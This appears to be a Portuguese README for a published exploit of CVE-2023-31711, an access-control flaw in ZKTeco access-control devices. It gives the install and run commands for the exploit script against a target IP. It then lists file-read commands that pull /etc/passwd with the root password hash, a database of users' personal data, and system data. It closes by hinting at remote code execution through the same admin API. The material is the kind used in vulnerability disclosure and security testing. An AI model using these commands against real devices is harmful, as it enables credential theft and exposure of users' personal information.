CVE-2023-31711
Controle de Acesso Incorreto no ZKTECO permite que invasores remotos leiam qualquer arquivo através da API administrativa.
Instalando módulos necessários
- Dentro do diretório ZKTEco:
$ pip install -r ./pyzatt/requirements_dev.txt
Executando o exploit
- Dentro do diretório ZKTEco:
$ python exploit.py <ip_address>
Connected to 10.0.2.25
(Cmd) get_file <file_name>
Exemplos:
get_file /etc/passwd: Revela o hash da senha do root
get_file /mnt/mtdblock/data/ZKDB.db: Revela informações pessoais identificáveis (PII) de usuários registrados. Para ler o conteúdo, pode ser necessário executar este comando sequencialmente várias vezes até que todo o conteúdo
seja revelado
get_file /mnt/mtdblock/data/ZKSystem.db: Revela informações sensíveis relacionadas ao sistema
Créditos
Nota
Os dispositivos podem ser potencialmente vulneráveis à Execução Remota de Código também através do uso da API administrativa. O exploit mencionado na seção de créditos pode ser um bom lugar para encontrar um teste para isso.